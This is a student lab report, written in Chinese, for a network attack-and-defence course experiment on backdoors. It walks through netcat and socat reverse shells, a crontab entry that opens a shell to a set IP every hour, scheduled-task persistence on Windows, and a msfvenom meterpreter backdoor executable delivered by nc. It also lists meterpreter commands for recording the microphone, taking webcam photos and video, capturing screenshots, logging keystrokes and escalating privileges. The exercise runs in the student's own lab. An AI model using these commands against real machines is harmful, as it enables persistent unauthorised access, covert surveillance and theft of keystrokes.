20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践
常用后门工具
一、Windows获得Linux的Shell
在本机cmd
中使用ipconfig
获得windows的IP地址
1.windows 打开监听
2.Linux反弹连接win
nc(主机ip) 5231(所设置的端口) -e /bin/sh
3.windows下获得一个linux shell,可运行任何指令,如ls
二、Linux获得Win Shell
ifconfig
获得虚拟机IP
1.Linux运行监听指令
使用指令,nc -l -p 5231
,监听5231端口
2.Windows反弹连接Linux
3.Linux下看到Windows的命令提示
三、使用nc传输数据
1.Windows下监听5231端口:
2.Kali下连接到Windows的5231端口:
3.建立连接之后,就可以传输数据了:
实验内容
一、使用netcat获取主机操作Shell,cron启动
先在Windows系统下,用ncat.exe -l -p 5231
,监听端口
用crontab -e
指令编辑一条定时任务
在最后一行加入53* * * * /bin/netcat 10.1.1.141 5236 -e /bin/sh,意思是在每个小时的第53分钟(为测试结果方便所选时间最好离现实时间较近)反向连接Windows主机的5231端口,就会启动cron
到时间后,便获得了Kali的shell,可以输入指令
二、使用socat获取主机操作Shell, 任务计划启动
在Windows系统下,打开控制面板->管理工具->任务计划程序(可在控制面板直接搜索任务计划),创建任务,填写任务名称后,新建一个触发器
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5231 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe绑定到端口5231,同时把cmd.exe的stderr重定向到stdout上:
创建完成之后,选择运行
然后在Kali环境下输入指令socat - tcp:IP(目标主机):5231
,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5231端口,此时可以发现已经成功获得了一个cmd shell
三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT=5231 -f exe > 20155231_backdoor.exe
生成后门程序
然后通过nc指令将生成的后门程序传送到Windows主机上
windows:ncat.exe -l 5231 > 20155231_backdoor.exe
kali:nc IP(win) 5231 < 20155231.exe
在Kali上使用msfconsole指
令进入msf控制台,
设置完成后,利用exploit
,执行监听
在windows中,运行20155231_backdoor.exe
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell
四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用record_mic指令可以截获一段音频
-
使用webcam_snap指令可以使用摄像头进行拍照
-
使用webcam stream指令可以使用摄像头进行录像
-
使用screenshot指令可以进行截屏
-
使用keyscan_start指令开始记录下击键的过程,使用
keyscan_dump
指令读取击键的记录 -
先使用getuid指令查看当前用户,使用getsystem指令进行提权
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
- 下载安装软件
(2)例举你知道的后门如何启动起来(win及linux)的方式?
- 直接启动,定时启动。
(3)Meterpreter有哪些给你映像深刻的功能?
- 更改获得权限,打开目标主机摄像头等控件
(4)如何发现自己有系统有没有被安装后门?
- 杀毒软件,监控程序运行
实验总结与体会
本次实验,由于虚拟机网络连接经常出现问题,借用了同学的虚拟机做实验。学习使用了nc等后门工具。完成了使用MSF截屏、录音等操作,提权失败。